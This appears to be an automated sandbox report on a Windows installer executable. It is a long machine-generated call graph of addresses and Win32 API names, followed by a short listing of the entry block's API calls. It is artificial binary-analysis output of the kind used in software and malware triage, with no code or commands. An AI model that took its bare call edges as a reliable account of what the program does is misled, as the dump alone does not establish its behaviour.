4122->4123 4130 4020f0 4122->4130 4124 4021a1 GlobalAlloc 4123->4124 4125 402172 4123->4125 4126 407e06 18 API calls 4124->4126 4140 402127 4125->4140 4143 407cb6 lstrcpynA 4125->4143 4126->4140 4127 402101 4128 407e06 18 API calls 4127->4128 4131 402115 4128->4131 4130->4127 4133 40212e 4130->4133 4136 407836 MessageBoxIndirectA 4131->4136 4132 402189 GlobalFree 4132->4140 4141 407cb6 lstrcpynA 4133->4141 4135 402141 4142 407cb6 lstrcpynA 4135->4142 4136->4140 4138 402157 4144 407cb6 lstrcpynA 4138->4144 4141->4135 4142->4138 4143->4132 4144->4140 4145 4021e3 4146 401456 18 API calls 4145->4146 4147 4021ef 4146->4147 4148 401456 18 API calls 4147->4148 4149 4021fe 4148->4149 4150 402216 4149->4150 4151 401400 18 API calls 4149->4151 4152 40222e 4150->4152 4155 401400 18 API calls 4150->4155 4151->4150 4153 402245 4152->4153 4154 4022c6 4152->4154 4156 401456 18 API calls 4153->4156 4157 401400 18 API calls 4154->4157 4155->4152 4158 40224a 4156->4158 4159 4022cb 4157->4159 4160 401456 18 API calls 4158->4160 4161 401400 18 API calls 4159->4161 4162 40225d 4160->4162 4163 4022de FindWindowExA 4161->4163 4164 4022a9 SendMessageA 4162->4164 4165 402269 SendMessageTimeoutA 4162->4165 4167 402308 4163->4167 4164->4167 4165->4167 4166 402332 4167->4166 4169 407be3 wsprintfA 4167->4169 4169->4166 4170 403164 4171 401400 18 API calls 4170->4171 4172 403170 4171->4172 4178 407a78 GetFileAttributesA CreateFileA 4172->4178 4174 402530 4176 40253c 4174->4176 4177 407be3 wsprintfA 4174->4177 4177->4176 4178->4174 3798 401ae6 3799 401400 18 API calls 3798->3799 3800 401af2 3799->3800 3801 407ad4 2 API calls 3800->3801 3802 401aff 3800->3802 3801->3802 4179 401968 4180 401400 18 API calls 4179->4180 4181 401974 4180->4181 4182 401400 18 API calls 4181->4182 4183 401983 4182->4183 4184 401400 18 API calls 4183->4184 4185 401992 MoveFileA 4184->4185 4186 4019b2 4185->4186 4187 4019a6 4185->4187 4189 408123 2 API calls 4186->4189 4191 402a3c 4186->4191 4188 40163b 23 API calls 
4187->4188 4187->4191 4188->4191 4190 4019c7 4189->4190 4190->4191 4192 408311 39 API calls 4190->4192 4192->4187 4193 40236a 4194 401456 18 API calls 4193->4194 4195 402376 4194->4195 4196 401456 18 API calls 4195->4196 4197 402385 GetDlgItem 4196->4197 4198 402530 4197->4198 4201 407be3 wsprintfA 4198->4201 4200 40253c 4201->4200 4202 4019ea 4203 401400 18 API calls 4202->4203 4204 4019f6 GetFullPathNameA 4203->4204 4207 401a25 4204->4207 4211 401a58 4204->4211 4205 403831 4206 401a7b GetShortPathNameA 4206->4205 4208 408123 2 API calls 4207->4208 4207->4211 4209 401a3e 4208->4209 4209->4211 4212 407cb6 lstrcpynA 4209->4212 4211->4205 4211->4206 4212->4211 4213 404fed 4214 405013 4213->4214 4215 405007 4213->4215 4217 405025 GetDlgItem GetDlgItem 4214->4217 4218 40509d 4214->4218 4215->4214 4216 40555f 4215->4216 4219 405564 SetWindowPos 4216->4219 4220 4055a6 4216->4220 4221 404d65 18 API calls 4217->4221 4222 4050c1 4218->4222 4232 403845 2 API calls 4218->4232 4223 4056a8 4219->4223 4224 4055ab ShowWindow 4220->4224 4225 4055cf 4220->4225 4226 405071 SetClassLongA 4221->4226 4227 404bd7 SendMessageA 4222->4227 4233 405134 4222->4233 4228 404f0f 8 API calls 4223->4228 4224->4223 4229 4055f1 4225->4229 4230 4055d7 DestroyWindow 4225->4230 4231 403903 2 API calls 4226->4231 4266 4050cd 4227->4266 4228->4233 4235 4055f6 SetWindowLongA 4229->4235 4236 40561c 4229->4236 4234 4053e3 4230->4234 4231->4218 4237 4050ef 4232->4237 4234->4233 4244 40553d ShowWindow 4234->4244 4235->4233 4236->4223 4238 405628 GetDlgItem 4236->4238 4237->4222 4239 4050f5 SendMessageA 4237->4239 4242 405650 SendMessageA IsWindowEnabled 4238->4242 4243 405641 4238->4243 4239->4233 4240 40537a DestroyWindow EndDialog 4240->4234 4241 403903 2 API calls 4241->4266 4242->4233 4242->4243 4246 405693 4243->4246 4247 4056f7 SendMessageA 4243->4247 4249 4056b1 4243->4249 4255 405647 4243->4255 4244->4233 4245 407e06 18 API calls 4245->4266 4246->4247 4246->4255 4247->4223 4250 4056d3 4249->4250 4251 
4056ba 4249->4251 4253 403903 2 API calls 4250->4253 4252 403903 2 API calls 4251->4252 4252->4255 4253->4255 4254 404d65 18 API calls 4254->4266 4255->4223 4282 404cc8 4255->4282 4256 404d65 18 API calls 4257 4051bc GetDlgItem 4256->4257 4258 4051e7 ShowWindow 4257->4258 4257->4266 4258->4266 4260 40525a EnableMenuItem SendMessageA 4261 4052af SendMessageA 4260->4261 4260->4266 4261->4266 4264 4053c8 DestroyWindow 4264->4234 4265 405407 CreateDialogParamA 4264->4265 4265->4234 4267 405448 4265->4267 4266->4233 4266->4240 4266->4241 4266->4245 4266->4254 4266->4256 4266->4258 4266->4260 4266->4264 4270 407e06 18 API calls 4266->4270 4278 404d44 EnableWindow 4266->4278 4279 404c96 SendMessageA 4266->4279 4280 407cb6 lstrcpynA 4266->4280 4281 407cde lstrlenA 4266->4281 4269 404d65 18 API calls 4267->4269 4271 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4269->4271 4272 405314 SetWindowTextA 4270->4272 4273 403845 2 API calls 4271->4273 4274 403845 2 API calls 4272->4274 4275 4054ee 4273->4275 4274->4266 4275->4233 4276 4054fd ShowWindow 4275->4276 4277 404bd7 SendMessageA 4276->4277 4277->4234 4278->4266 4279->4266 4280->4266 4283 404cd6 4282->4283 4284 404cdc SendMessageA 4282->4284 4283->4284 4284->4223 4285 401771 SetForegroundWindow 4286 40219b 4285->4286 4287 4033f2 4288 403401 4287->4288 4291 40345f 4287->4291 4289 40340f FindNextFileA 4288->4289 4290 403429 4289->4290 4289->4291 4290->4291 4293 407cb6 lstrcpynA 4290->4293 4293->4291 3372 404375 SetErrorMode GetVersion 3373 4043a7 3372->3373 3374 40439b 3372->3374 3376 4043d9 3373->3376 3377 40820e 3 API calls 3373->3377 3375 408299 5 API calls 3374->3375 3375->3373 3378 408299 5 API calls 3376->3378 3379 4043c8 lstrlenA 3377->3379 3380 4043e5 3378->3380 3379->3373 3381 408299 5 API calls 3380->3381 3382 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 3381->3382 3468 407cb6 lstrcpynA 3382->3468 3384 404457 GetCommandLineA 3469 407cb6 lstrcpynA 3384->3469 3386 40446f GetModuleHandleA 3387 
404494 3386->3387 3388 4078a4 CharNextA 3387->3388 3389 4044ac CharNextA 3388->3389 3398 4044be 3389->3398 3390 404560 GetTempPathA 3470 4042bc 3390->3470 3393 404580 DeleteFileA 3479 403f03 GetTickCount GetModuleFileNameA 3393->3479 3394 4045a7 GetWindowsDirectoryA 3581 407ce8 lstrcatA 3394->3581 3396 4078a4 CharNextA 3396->3398 3398->3390 3398->3396 3401 404523 3398->3401 3400 4045dd 3571 404316 3400->3571 3580 407cb6 lstrcpynA 3401->3580 3407 40453d 3407->3390 3408 40465b 3509 4060fd 3408->3509 3409 40459a 3409->3400 3409->3408 3413 4078a4 CharNextA 3409->3413 3411 404844 3417 404836 ExitProcess 3411->3417 3418 408299 5 API calls 3411->3418 3412 404826 3599 407836 3412->3599 3415 404608 3413->3415 3420 404662 3415->3420 3423 40461c 3415->3423 3419 40485d 3418->3419 3422 408299 5 API calls 3419->3422 3421 4082eb 5 API calls 3420->3421 3425 404667 3421->3425 3426 40486c 3422->3426 3582 40815b 3423->3582 3598 407ce8 lstrcatA 3425->3598 3427 408299 5 API calls 3426->3427 3430 40487b 3427->3430 3435 4048a1 GetCurrentProcess 3430->3435 3451 4048be 3430->3451 3435->3451 3436 404649 3597 407cb6 lstrcpynA 3436->3597 3437 408299 5 API calls 3446 40493f 3437->3446 3442 404944 ExitWindowsEx 3442->3417 3445 404991 3442->3445 3603 403903 3445->3603 3446->3442 3446->3445 3451->3437 3468->3384 3469->3386 3471 407d37 5 API calls 3470->3471 3473 4042ce 3471->3473 3472 404312 3472->3393 3472->3394 3473->3472 3606 407cf2 lstrlenA CharPrevA 3473->3606 3476 40774b 2 API calls 3477 4042fd 3476->3477 3610 407ad4 3477->3610 3615 407a78 GetFileAttributesA CreateFileA 3479->3615 3481 403f5b 3508 404012 3481->3508 3616 407cb6 lstrcpynA 3481->3616 3483 403f87 3617 4078ce lstrlenA 3483->3617 3487 403fa8 GetFileSize 3489 403fce 3487->3489 3488 4040c3 3624 4039fe 3488->3624 3489->3488 3493 404006 3489->3493 3499 4039fe 31 API calls 3489->3499 3489->3508 3622 403ae9 ReadFile 3489->3622 3495 4039fe 31 API calls 3493->3495 3494 404172 GlobalAlloc 3498 404197 3494->3498 3495->3508 3497 404149 3501 
403ae9 ReadFile 3497->3501 3500 407ad4 2 API calls 3498->3500 3499->3489 3502 4041a7 CreateFileA 3500->3502 3503 40415a 3501->3503 3504 4041f6 3502->3504 3502->3508 3503->3494 3503->3508 3640 403b31 SetFilePointer 3504->3640 3506 404206 3641 403d52 3506->3641 3508->3409 3510 408299 5 API calls 3509->3510 3511 406117 3510->3511 3512 406136 3511->3512 3513 40611c 3511->3513 3514 407b3a 3 API calls 3512->3514 3686 407be3 wsprintfA 3513->3686 3515 40616c 3514->3515 3517 4061a4 3515->3517 3520 407b3a 3 API calls 3515->3520 3687 407ce8 lstrcatA 3517->3687 3519 406131 3677 404ae0 3519->3677 3520->3517 3523 40815b 17 API calls 3524 4061e5 3523->3524 3525 4062bc 3524->3525 3527 407b3a 3 API calls 3524->3527 3526 40815b 17 API calls 3525->3526 3528 4062ca 3526->3528 3530 406228 3527->3530 3529 4062e7 LoadImageA 3528->3529 3531 407e06 18 API calls 3528->3531 3532 406405 3529->3532 3533 40632f RegisterClassA 3529->3533 3530->3525 3537 40625a 3530->3537 3540 4078a4 CharNextA 3530->3540 3534 4062e5 3531->3534 3536 403903 2 API calls 3532->3536 3535 406374 SystemParametersInfoA CreateWindowExA 3533->3535 3569 40636d 3533->3569 3534->3529 3535->3532 3539 406411 3536->3539 3688 407cde lstrlenA 3537->3688 3544 404ae0 19 API calls 3539->3544 3539->3569 3540->3537 3547 406421 3544->3547 3550 406513 3547->3550 3551 40642e ShowWindow 3547->3551 3689 404c0d OleInitialize 3550->3689 3555 40820e 3 API calls 3551->3555 3558 406452 3555->3558 3557 40651f 3560 406541 3557->3560 3565 406524 3557->3565 3559 406464 GetClassInfoA 3558->3559 3561 40820e 3 API calls 3558->3561 3563 40648a GetClassInfoA RegisterClassA 3559->3563 3564 4064be DialogBoxParamA 3559->3564 3562 403903 2 API calls 3560->3562 3566 406463 3561->3566 3562->3569 3563->3564 3567 403903 2 API calls 3564->3567 3568 403903 2 API calls 3565->3568 3565->3569 3566->3559 3570 406504 3567->3570 3568->3569 3569->3400 3570->3569 3572 404326 CloseHandle 3571->3572 3573 40433a 3571->3573 3572->3573 3574 404344 CloseHandle 3573->3574 3575 
404358 3573->3575 3574->3575 3700 4049da 3575->3700 3580->3407 3791 407cb6 lstrcpynA 3582->3791 3584 408176 3585 407935 3 API calls 3584->3585 3586 408184 3585->3586 3587 40462a 3586->3587 3588 407d37 5 API calls 3586->3588 3587->3400 3596 407cb6 lstrcpynA 3587->3596 3589 408197 3588->3589 3589->3587 3590 4081b7 lstrlenA 3589->3590 3593 408123 2 API calls 3589->3593 3595 4078ce 2 API calls 3589->3595 3590->3589 3591 4081ea 3590->3591 3592 407cf2 3 API calls 3591->3592 3594 4081ef GetFileAttributesA 3592->3594 3593->3589 3594->3587 3595->3589 3596->3436 3597->3408 3600 407850 3599->3600 3601 407855 MessageBoxIndirectA 3599->3601 3600->3601 3602 4078a0 3600->3602 3601->3602 3602->3417 3604 403845 2 API calls 3603->3604 3605 403925 3604->3605 3605->3417 3607 407d1c 3606->3607 3608 4042f0 3606->3608 3614 407ce8 lstrcatA 3607->3614 3608->3476 3611 407ae8 3610->3611 3612 407b27 3611->3612 3613 407aeb GetTickCount GetTempFileNameA 3611->3613 3612->3472 3613->3611 3613->3612 3615->3481 3616->3483 3618 4078e4 3617->3618 3619 4078e9 CharPrevA 3618->3619 3620 403f97 3618->3620 3619->3618 3619->3620 3621 407cb6 lstrcpynA 3620->3621 3621->3487 3623 403b22 3622->3623 3623->3489 3625 403a0b 3624->3625 3626 403a2d 3624->3626 3627 403a14 DestroyWindow 3625->3627 3628 403a1e 3625->3628 3629 403a36 3626->3629 3630 403a48 GetTickCount 3626->3630 3627->3628 3628->3494 3628->3508 3639 403b31 SetFilePointer 3628->3639 3631 408848 2 API calls 3629->3631 3630->3628 3632 403a5a 3630->3632 3631->3628 3633 403a63 3632->3633 3634 403a9b CreateDialogParamA ShowWindow 3632->3634 3633->3628 3655 40392c MulDiv 3633->3655 3635 403a99 3634->3635 3635->3628 3637 403a74 wsprintfA 3638 406fcb 23 API calls 3637->3638 3638->3635 3639->3497 3640->3506 3642 403d92 3641->3642 3643 403d62 SetFilePointer 3641->3643 3656 403b63 GetTickCount 3642->3656 3643->3642 3646 403ea8 3646->3508 3647 403da9 ReadFile 3647->3646 3648 403de2 3647->3648 3648->3646 3649 403b63 41 API calls 3648->3649 3650 403dfe 3649->3650 
3650->3646 3651 403eba ReadFile 3650->3651 3653 403e15 3650->3653 3651->3646 3652 403e6b ReadFile 3652->3646 3652->3653 3653->3646 3653->3652 3654 403e23 WriteFile 3653->3654 3654->3646 3654->3653 3655->3637 3657 403b93 3656->3657 3658 403d35 3656->3658 3669 403b31 SetFilePointer 3657->3669 3659 4039fe 31 API calls 3658->3659 3665 403cec 3659->3665 3661 403ba3 SetFilePointer 3667 403be3 3661->3667 3662 403ae9 ReadFile 3662->3667 3664 4039fe 31 API calls 3664->3667 3665->3646 3665->3647 3666 403c98 WriteFile 3666->3665 3666->3667 3667->3662 3667->3664 3667->3665 3667->3666 3668 403d13 SetFilePointer 3667->3668 3670 40893d 3667->3670 3668->3658 3669->3661 3671 408cf0 3670->3671 3672 40896b 3670->3672 3671->3667 3672->3671 3673 408b69 GlobalAlloc 3672->3673 3674 408b4d GlobalFree 3672->3674 3675 408c55 GlobalAlloc 3672->3675 3676 408c45 GlobalFree 3672->3676 3673->3671 3673->3672 3674->3673 3675->3671 3675->3672 3676->3675 3678 404af5 3677->3678 3696 407be3 wsprintfA 3678->3696 3680 404b73 3681 407e06 18 API calls 3680->3681 3682 404b89 SetWindowTextA 3681->3682 3683 404bad 3682->3683 3684 404bcf 3683->3684 3685 407e06 18 API calls 3683->3685 3684->3523 3685->3683 3686->3519 3697 404bd7 3689->3697 3691 404c41 3693 403845 2 API calls 3691->3693 3695 404c64 3691->3695 3692 404bd7 SendMessageA 3694 404c81 OleUninitialize 3692->3694 3693->3691 3694->3557 3695->3692 3696->3680 3698 404be0 SendMessageA 3697->3698 3699 404c0a 3697->3699 3698->3699 3699->3691 3701 4049f4 3700->3701 3702 40435d 3701->3702 3703 4049f9 FreeLibrary GlobalFree 3701->3703 3704 4085b8 3702->3704 3703->3701 3705 40815b 17 API calls 3704->3705 3706 4085cf 3705->3706 3707 4085f3 3706->3707 3708 4085d6 DeleteFileA 3706->3708 3709 404371 OleUninitialize 3707->3709 3711 4087b6 3707->3711 3747 407cb6 lstrcpynA 3707->3747 3708->3709 3709->3411 3709->3412 3711->3709 3752 408123 FindFirstFileA 3711->3752 3712 408625 3714 408630 3712->3714 3715 408648 3712->3715 3755 407ce8 lstrcatA 3714->3755 3718 4078ce 2 
API calls 3715->3718 3719 408644 3718->3719 3722 408671 lstrlenA FindFirstFileA 3719->3722 3756 407ce8 lstrcatA 3719->3756 3720 407cf2 3 API calls 3721 4087e2 3720->3721 3724 407a46 2 API calls 3721->3724 3722->3711 3742 4086a7 3722->3742 3726 4087eb RemoveDirectoryA 3724->3726 3728 4087fa 3726->3728 3729 40882c 3726->3729 3727 4078a4 CharNextA 3727->3742 3728->3709 3731 408800 3728->3731 3730 406fcb 23 API calls 3729->3730 3730->3709 3732 406fcb 23 API calls 3731->3732 3733 408810 3732->3733 3734 408311 39 API calls 3733->3734 3735 408822 3734->3735 3735->3709 3736 40878f FindNextFileA 3738 4087ac FindClose 3736->3738 3736->3742 3738->3711 3740 4085b8 56 API calls 3740->3742 3742->3727 3742->3736 3742->3740 3743 406fcb 23 API calls 3742->3743 3746 408751 3742->3746 3748 407cb6 lstrcpynA 3742->3748 3749 407a46 GetFileAttributesA 3742->3749 3743->3742 3744 406fcb 23 API calls 3744->3746 3746->3742 3746->3744 3757 408311 3746->3757 3747->3712 3748->3742 3750 407a71 DeleteFileA 3749->3750 3751 407a5f SetFileAttributesA 3749->3751 3750->3742 3751->3750 3753 408155 3752->3753 3754 408146 FindClose 3752->3754 3753->3709 3753->3720 3754->3753 3758 408299 5 API calls 3757->3758 3759 40832c 3758->3759 3760 408345 3759->3760 3763 4085a8 3759->3763 3783 407a78 GetFileAttributesA CreateFileA 3759->3783 3761 4083b5 GetShortPathNameA 3760->3761 3760->3763 3761->3763 3765 4083d5 3761->3765 3763->3746 3764 40837d CloseHandle GetShortPathNameA 3764->3760 3764->3763 3765->3763 3766 4083e0 wsprintfA 3765->3766 3767 407e06 18 API calls 3766->3767 3768 408423 3767->3768 3784 407a78 GetFileAttributesA CreateFileA 3768->3784 3770 408441 3770->3763 3771 40844f GetFileSize GlobalAlloc 3770->3771 3772 408488 ReadFile 3771->3772 3773 40859e CloseHandle 3771->3773 3772->3773 3774 4084b3 3772->3774 3773->3763 3774->3773 3785 4079b4 lstrlenA 3774->3785 3777 4084d2 3790 407cb6 lstrcpynA 3777->3790 3778 4084ee 3780 4079b4 3 API calls 3778->3780 3781 4084e8 3780->3781 3782 408547 SetFilePointer 
WriteFile GlobalFree 3781->3782 3782->3773 3783->3764 3784->3770 3786 4079d4 3785->3786 3787 407a05 3786->3787 3788 4079df lstrcmpiA 3786->3788 3787->3777 3787->3778 3788->3787 3789 407a09 CharNextA 3788->3789 3789->3786 3790->3781 3791->3584 4294 403376 4295 401456 18 API calls 4294->4295 4296 403394 4295->4296 4297 40339f SetFilePointer 4296->4297 4300 4033c9 4297->4300 4298 401456 18 API calls 4298->4300 4299 4037a0 4301 402a3c 4299->4301 4302 407e06 18 API calls 4299->4302 4300->4298 4300->4299 4300->4301 4302->4301 4303 4017f7 4304 402530 4303->4304 4307 407be3 wsprintfA 4304->4307 4306 40253c 4307->4306 4315 40247c GetDC GetDeviceCaps 4316 401456 18 API calls 4315->4316 4317 4024ad MulDiv 4316->4317 4318 401456 18 API calls 4317->4318 4319 4024d9 4318->4319 4320 407e06 18 API calls 4319->4320 4321 402520 CreateFontIndirectA 4320->4321 4322 40252f 4321->4322 4325 407be3 wsprintfA 4322->4325 4324 40253c 4325->4324 4326 40367d 4327 401456 18 API calls 4326->4327 4328 403689 4327->4328 4329 4036ae 4328->4329 4330 4036df 4328->4330 4335 402a3c 4328->4335 4333 4036b0 4329->4333 4339 4036ca 4329->4339 4331 403700 4330->4331 4332 4036eb 4330->4332 4336 407e06 18 API calls 4331->4336 4334 401456 18 API calls 4332->4334 4342 407cb6 lstrcpynA 4333->4342 4334->4335 4336->4335 4338 401456 18 API calls 4338->4339 4339->4335 4339->4338 4340 4037a0 4339->4340 4340->4335 4341 407e06 18 API calls 4340->4341 4341->4335 4342->4335 4343 401000 4344 401032 BeginPaint GetClientRect 4343->4344 4345 401017 DefWindowProcA 4343->4345 4347 401078 4344->4347 4350 401212 4345->4350 4348 401130 4347->4348 4349 401084 CreateBrushIndirect FillRect DeleteObject 4347->4349 4351 40113a CreateFontIndirectA 4348->4351 4352 4011db EndPaint 4348->4352 4349->4347 4351->4352 4353 401151 6 API calls 4351->4353 4352->4350 4353->4352 4361 401803 4362 40181c 4361->4362 4363 40180d ShowWindow 4361->4363 4364 40256d ShowWindow 4362->4364 4365 4037d4 4362->4365 4363->4362 4364->4365 4366 402583 4367 401400 
18 API calls 4366->4367 4368 40258f 4367->4368 4369 401400 18 API calls 4368->4369 4370 40259e 4369->4370 4371 401400 18 API calls 4370->4371 4372 4025ad 4371->4372 4373 401400 18 API calls 4372->4373 4374 4025bc 4373->4374 4375 40163b 23 API calls 4374->4375 4376 4025c9 ShellExecuteA 4375->4376 3803 401b06 3804 401400 18 API calls 3803->3804 3805 401b12 3804->3805 3806 401b2b 3805->3806 3807 401b3d 3805->3807 3848 407cb6 lstrcpynA 3806->3848 3849 407cb6 lstrcpynA 3807->3849 3810 401b3b 3814 407d37 5 API calls 3810->3814 3811 401b51 3812 407cf2 3 API calls 3811->3812 3813 401b5b 3812->3813 3850 407ce8 lstrcatA 3813->3850 3816 401b76 3814->3816 3817 408123 2 API calls 3816->3817 3834 401ba9 3816->3834 3818 401b88 3817->3818 3821 401b91 CompareFileTime 3818->3821 3818->3834 3819 407a46 2 API calls 3819->3834 3821->3834 3822 401cce 3824 406fcb 23 API calls 3822->3824 3823 401c05 3825 406fcb 23 API calls 3823->3825 3827 401cde 3824->3827 3828 401c15 3825->3828 3826 407cb6 lstrcpynA 3826->3834 3829 403d52 46 API calls 3827->3829 3830 401d08 3829->3830 3831 401d25 SetFileTime 3830->3831 3833 401d47 FindCloseChangeNotification 3830->3833 3831->3833 3832 407e06 18 API calls 3832->3834 3833->3828 3835 401d59 3833->3835 3834->3819 3834->3822 3834->3823 3834->3826 3834->3832 3841 407836 MessageBoxIndirectA 3834->3841 3844 401ca5 3834->3844 3847 407a78 GetFileAttributesA CreateFileA 3834->3847 3836 401d86 3835->3836 3837 401d5e 3835->3837 3839 407e06 18 API calls 3836->3839 3838 407e06 18 API calls 3837->3838 3840 401d72 3838->3840 3843 401d84 3839->3843 3851 407ce8 lstrcatA 3840->3851 3841->3834 3845 407836 MessageBoxIndirectA 3843->3845 3844->3828 3846 406fcb 23 API calls 3844->3846 3845->3828 3846->3828 3847->3834 3848->3810 3849->3811 4384 402008 4385 401456 18 API calls 4384->4385 4386 402016 4385->4386 4387 401456 18 API calls 4386->4387 4388 402025 4387->4388 4391 407be3 wsprintfA 4388->4391 4390 402332 4391->4390 4392 401f08 4393 401400 18 API calls 4392->4393 4394 
401f14 4393->4394 4395 401400 18 API calls 4394->4395 4396 401f23 4395->4396 4397 401f34 lstrcmpiA 4396->4397 4398 401f3c lstrcmpA 4396->4398 4399 401f42 4397->4399 4398->4399 4400 402988 4401 401400 18 API calls 4400->4401 4402 402994 4401->4402 4403 401400 18 API calls 4402->4403 4404 4029a7 4403->4404 4405 401400 18 API calls 4404->4405 4406 4029b6 4405->4406 4407 401400 18 API calls 4406->4407 4408 4029c9 4407->4408 4409 401400 18 API calls 4408->4409 4411 4029d8 4409->4411 4410 4029f9 CoCreateInstance 4412 402a2f 4410->4412 4419 402a46 4410->4419 4411->4410 4413 401400 18 API calls 4411->4413 4415 40163b 23 API calls 4412->4415 4414 4029f8 4413->4414 4414->4410 4417 402a3b 4415->4417 4416 402bc5 4418 40163b 23 API calls 4416->4418 4418->4417 4420 402b39 MultiByteToWideChar 4419->4420 4421 402b7c 4419->4421 4420->4421 4421->4412 4421->4416 4422 403089 4431 4015b0 4422->4431 4424 403095 4425 401456 18 API calls 4424->4425 4426 4030a4 4425->4426 4427 4030e5 RegEnumValueA 4426->4427 4428 4030c7 RegEnumKeyA 4426->4428 4430 402a3c 4426->4430 4429 40312b RegCloseKey 4427->4429 4427->4430 4428->4429 4429->4430 4432 401400 18 API calls 4431->4432 4433 4015cc RegOpenKeyExA 4432->4433 4433->4424 4435 40710b 4436 4073a5 4435->4436 4450 40712c 4435->4450 4437 407404 4436->4437 4438 4073ad GetDlgItem CreateThread CloseHandle 4436->4438 4440 40740c 4437->4440 4441 40744f 4437->4441 4439 4074ba 4438->4439 4443 407449 4439->4443 4448 4074cd SendMessageA 4439->4448 4442 407418 ShowWindow ShowWindow 4440->4442 4440->4443 4441->4439 4444 407473 ShowWindow 4441->4444 4455 407460 4441->4455 4483 404c96 SendMessageA 4442->4483 4445 404f0f 8 API calls 4443->4445 4447 407494 4444->4447 4444->4455 4449 407687 4445->4449 4451 406fcb 23 API calls 4447->4451 4448->4449 4453 4074fc CreatePopupMenu 4448->4453 4481 404c96 SendMessageA 4450->4481 4451->4455 4452 404cc8 SendMessageA 4452->4439 4456 407e06 18 API calls 4453->4456 4455->4452 4458 407518 AppendMenuA 4456->4458 4457 4071b9 4462 
4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4457->4462 4459 407540 GetWindowRect 4458->4459 4460 40755a 4458->4460 4461 407564 TrackPopupMenu 4459->4461 4460->4461 4461->4449 4463 40759e 4461->4463 4464 407247 SendMessageA SendMessageA 4462->4464 4465 40727f 4462->4465 4468 4075c4 SendMessageA 4463->4468 4469 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4463->4469 4464->4465 4466 407285 SendMessageA 4465->4466 4467 4072a8 4465->4467 4466->4467 4470 404d65 18 API calls 4467->4470 4468->4463 4471 40762a SendMessageA 4469->4471 4472 4072c5 4470->4472 4471->4471 4473 407664 GlobalUnlock SetClipboardData CloseClipboard 4471->4473 4474 4072d1 ShowWindow 4472->4474 4475 40731c SendMessageA 4472->4475 4473->4449 4476 4072f4 ShowWindow 4474->4476 4477 407305 4474->4477 4475->4449 4480 407365 SendMessageA SendMessageA 4475->4480 4476->4477 4482 404c96 SendMessageA 4477->4482 4480->4449 4481->4457 4482->4475 4483->4443 4484 403491 4485 401400 18 API calls 4484->4485 4487 40349d 4485->4487 4486 4034b9 4489 407a46 2 API calls 4486->4489 4487->4486 4488 401400 18 API calls 4487->4488 4488->4486 4490 4034c2 4489->4490 4511 407a78 GetFileAttributesA CreateFileA 4490->4511 4492 4034db 4493 403500 GlobalAlloc 4492->4493 4494 4034e7 DeleteFileA 4492->4494 4496 403644 CloseHandle 4493->4496 4497 40352f 4493->4497 4495 403668 4494->4495 4499 40163b 23 API calls 4495->4499 4505 403677 4495->4505 4496->4494 4496->4495 4512 403b31 SetFilePointer 4497->4512 4499->4505 4500 40353b 4501 403ae9 ReadFile 4500->4501 4502 40354e GlobalAlloc 4501->4502 4503 40356b 4502->4503 4504 4035dd WriteFile GlobalFree 4502->4504 4506 403d52 46 API calls 4503->4506 4507 403d52 46 API calls 4504->4507 4509 40358f 4506->4509 4508 40363f 4507->4508 4508->4496 4510 4035d3 GlobalFree 4509->4510 4510->4504 4511->4492 4512->4500 3340 402613 3341 401400 18 API calls 3340->3341 3342 40261f 3341->3342 3343 406fcb 23 API calls 3342->3343 3344 402632 3343->3344 3356 407779 
CreateProcessA 3344->3356 3346 40263c 3347 402656 WaitForSingleObject 3346->3347 3348 402a3c 3346->3348 3355 4026b1 CloseHandle 3346->3355 3359 408848 3346->3359 3347->3346 3350 40267b GetExitCodeProcess 3347->3350 3353 402699 3350->3353 3350->3355 3351 403677 3351->3348 3363 407be3 wsprintfA 3353->3363 3355->3348 3355->3351 3357 4077f5 3356->3357 3358 4077e5 CloseHandle 3356->3358 3357->3346 3358->3357 3360 40885d PeekMessageA 3359->3360 3361 408881 DispatchMessageA 3360->3361 3362 40888d 3360->3362 3361->3360 3362->3346 3363->3355 3364 401714 3365 40171c 3364->3365 3368 403845 3365->3368 3370 403854 3368->3370 3369 40172e 3370->3369 3371 4038a0 MulDiv SendMessageA 3370->3371 3371->3370 4520 406614 GetDlgItem GetDlgItem 4521 406671 7 API calls 4520->4521 4526 4069d1 4520->4526 4522 406797 DeleteObject 4521->4522 4523 406777 SendMessageA 4521->4523 4524 4067b0 4522->4524 4523->4522 4528 407e06 18 API calls 4524->4528 4531 40681b 4524->4531 4525 406af3 4529 406b30 4525->4529 4530 406bf6 4525->4530 4526->4525 4527 406a56 4526->4527 4539 406557 4 API calls 4526->4539 4527->4525 4537 406ad0 SendMessageA 4527->4537 4551 406c7a 4527->4551 4534 4067d9 SendMessageA SendMessageA 4528->4534 4540 406b49 SendMessageA 4529->4540 4565 4069cb 4529->4565 4532 406c28 4530->4532 4533 406bff SendMessageA 4530->4533 4535 404d65 18 API calls 4531->4535 4538 406c31 4532->4538 4532->4551 4533->4565 4534->4524 4541 40683e 4535->4541 4536 404f0f 8 API calls 4542 406eca 4536->4542 4537->4525 4543 406c44 4538->4543 4544 406c3a ImageList_Destroy 4538->4544 4539->4527 4545 406b7b SendMessageA 4540->4545 4540->4565 4546 404d65 18 API calls 4541->4546 4547 406c4d GlobalFree 4543->4547 4543->4565 4544->4543 4548 406ba1 4545->4548 4549 40685d 4546->4549 4547->4565 4554 406bbf SendMessageA 4548->4554 4552 40696b 4549->4552 4557 4068b2 SendMessageA 4549->4557 4560 406902 SendMessageA 4549->4560 4561 406926 SendMessageA 4549->4561 4550 406e73 ShowWindow GetDlgItem ShowWindow 4550->4565 4553 403903 2 
Control-flow Graph: graph 0, entry block 404375-404399 (SetErrorMode, GetVersion)
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32 ref: 00404388
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 0040438F
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32 ref: 004043CC
                                                                                                                                                                                                                                                              • InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
                                                                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 00404405
                                                                                                                                                                                                                                                              • SHGetFileInfoA.SHELL32 ref: 0040443A
                                                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
                                                                                                                                                                                                                                                              • CharNextA.USER32 ref: 004044B1
